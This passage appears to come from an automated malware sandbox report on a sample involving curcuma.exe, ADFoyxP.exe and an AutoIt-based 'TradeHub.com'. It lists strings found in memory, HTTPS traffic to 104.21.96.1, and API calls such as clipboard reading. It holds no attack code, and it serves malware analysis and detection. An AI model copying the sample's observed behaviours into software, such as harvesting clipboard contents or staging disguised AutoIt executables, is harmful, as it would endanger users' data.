Source: curcuma.exe, 00000025.00000003.1891447354.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2038350228.0000012CE2C1E000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1803251253.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.comreport-to:
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.comreport-to:_dk_https://msn.com
Source: curcuma.exe, 00000025.00000003.1891540114.0000012CE2C43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.comsec-fetch-sitesame-sitesec-fetch-modecorssec-fetch-destemptyrefererhttps://ntp.ms
Source: curcuma.exe, 00000025.00000003.2010925300.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616351848.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2051938064.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1604475755.0000012CDD35F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1627781449.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1923866933.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2058966823.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616886676.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2023877190.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://odvr.nic.cz/doh
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pki.goog/repository/0
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://public.dns.iij.jp/
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://public.dns.iij.jp/dns-query
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sapphire.azureedge.net
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.eicar.org/eicar.com
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C22000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1719954053.0000012CE2C0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.eicar.org/eicar.com.txt
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.eicar.org/eicar.com.txt/
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.eicar.org/eicar.com.txtD
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.eicar.org/eicar.com/
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C22000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.eicar.org/eicar.com;
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://srtb.msn.com/auction
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://substrate.office.com
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://substrate.pnX
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://substrate.pnXrp
Source: curcuma.exe, 00000025.00000003.1922512788.0000012CE2E06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/en-GB/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=fire
Source: curcuma.exe, 00000025.00000003.1922512788.0000012CE2E06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/en-GB/products/firefoxgro.allizom.troppus.
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.ssl.ak.dynamic.tiles.virtualearth.net
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://titlehub.xboxlive.com/users/
Source: curcuma.exe, 00000025.00000003.1717845361.0000012CE2C1A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1740198504.0000012CDEEDC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: curcuma.exe, 00000025.00000003.1717845361.0000012CE2C1A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1740198504.0000012CDEEDC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://user.auth.xboxlive.com/user/authenticate
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: curcuma.exe, 00000025.00000003.1717845361.0000012CE2C1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C22000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.globalsign.com/repository/0
Source: curcuma.exe, 00000025.00000003.1892621877.0000012CDEE75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1719954053.0000012CE2C22000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1719954053.0000012CE2C0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
Source: curcuma.exe, 00000025.00000003.1717845361.0000012CE2C1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: curcuma.exe, 00000025.00000003.1740198504.0000012CDEEDC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/search?q=eicar
Source: curcuma.exe, 00000025.00000003.1922512788.0000012CE2E06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-GB/about/gro.allizom.www.
Source: curcuma.exe, 00000025.00000003.1922512788.0000012CE2E06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-GB/contribute/gro.allizom.www.
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
Source: curcuma.exe, 00000025.00000003.1922512788.0000012CE2E06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-GB/firefox/central/gro.allizom.www.
Source: curcuma.exe, 00000025.00000003.1922512788.0000012CE2E06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-GB/privacy/firefox/gro.allizom.www.
Source: curcuma.exe, 00000025.00000003.1922512788.0000012CE2E06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: curcuma.exe, 00000025.00000003.1922512788.0000012CE2E06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpgk
Source: curcuma.exe, 00000025.00000003.1922512788.0000012CE2E06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.nic.cz/odvr/
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.quad9.net/home/privacy/
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://xsts.auth.xboxlive.com/xsts/authorize
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52239
Source: unknown | Network traffic detected: HTTP traffic on port 60523 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50298
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52477
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52235
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 56953
Source: unknown | Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 60838 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 52421 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52924
Source: unknown | Network traffic detected: HTTP traffic on port 55366 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50423 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 51491 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 63141
Source: unknown | Network traffic detected: HTTP traffic on port 57794 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 56724
Source: unknown | Network traffic detected: HTTP traffic on port 54688 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 62854 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 62579 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60783
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60782
Source: unknown | Network traffic detected: HTTP traffic on port 60701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49608
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64228
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50757
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 51492 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 56735
Source: unknown | Network traffic detected: HTTP traffic on port 57795 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52133
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 63823
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 59576
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 62854
Source: unknown | Network traffic detected: HTTP traffic on port 65135 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55770
Source: unknown | Network traffic detected: HTTP traffic on port 63823 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60430
Source: unknown | Network traffic detected: HTTP traffic on port 61447 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 63951 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 64600 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49335 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 63141 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 60782 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52147
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 54688
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64923
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 63951
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53408
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 62460 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 55445 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 56917
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 65076
Source: unknown | Network traffic detected: HTTP traffic on port 64228 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 64606 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 60840 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 62115
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53652
Source: unknown | Network traffic detected: HTTP traffic on port 60839 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64309
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 58312
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55167
Source: unknown | Network traffic detected: HTTP traffic on port 52147 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 60940 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 62488
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 54759
Source: unknown | Network traffic detected: HTTP traffic on port 50298 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 52924 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 56019
Source: unknown | Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 54994
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 52748 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 51492
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61848
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 51491
Source: unknown | Network traffic detected: HTTP traffic on port 56019 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 62488 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 56724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 51930 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown | Network traffic detected: HTTP traffic on port 64184 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 56735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 51930
Source: unknown | Network traffic detected: HTTP traffic on port 55543 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49444 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 63304 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64562
Source: unknown | Network traffic detected: HTTP traffic on port 56092 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 64309 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60523
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64184
Source: unknown | Network traffic detected: HTTP traffic on port 60909 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 58979
Source: unknown | Network traffic detected: HTTP traffic on port 56752 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 64923 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49608 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49335
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown | Network traffic detected: HTTP traffic on port 59595 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 59726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown | Network traffic detected: HTTP traffic on port 56917 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 64722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 54336 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 59842
Source: unknown | Network traffic detected: HTTP traffic on port 52235 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 58979 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53652 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60701
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60940
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown | Network traffic detected: HTTP traffic on port 55770 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49444
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60839
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 62460
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60838
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 59726
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50473
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55366
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 62579
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 57794
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60398
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 57795
Source: unknown | Network traffic detected: HTTP traffic on port 54759 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60837
Source: unknown | Network traffic detected: HTTP traffic on port 60842 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50473 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 63304
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 62578
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 54214 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49674
Source: unknown | Network traffic detected: HTTP traffic on port 64562 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49673
Source: unknown | Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52421
Source: unknown | Network traffic detected: HTTP traffic on port 56309 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60840
Source: unknown | Network traffic detected: HTTP traffic on port 59576 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60842
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 59842 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 52133 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 54214
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 60783 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 56752
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55543
Source: unknown | Network traffic detected: HTTP traffic on port 52477 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 54336
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 59595
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown | Network traffic detected: HTTP traffic on port 55167 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 54994 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60909
Source: unknown | Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52167
Source: unknown | Network traffic detected: HTTP traffic on port 52239 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50423
Source: unknown | Network traffic detected: HTTP traffic on port 59373 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 52866 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 56092
Source: unknown | Network traffic detected: HTTP traffic on port 58312 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55445
Source: unknown | Network traffic detected: HTTP traffic on port 62578 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 61447
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 59373
Source: unknown | Network traffic detected: HTTP traffic on port 52167 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52748
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52866
Source: unknown | Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53408 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 56309
Source: unknown | Network traffic detected: HTTP traffic on port 61848 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 62115 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 56953 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 65076 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64606
Source: unknown | Network traffic detected: HTTP traffic on port 60837 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 60398 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 60430 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 65135
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64600
Source: unknown | Network traffic detected: HTTP traffic on port 50757 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64722
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:62579 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:60783 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:51492 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:57795 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:60838 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:60839 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:60840 version: TLS 1.2
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0082F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,23_2_0082F7C7
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0082F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,23_2_0082F55C
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
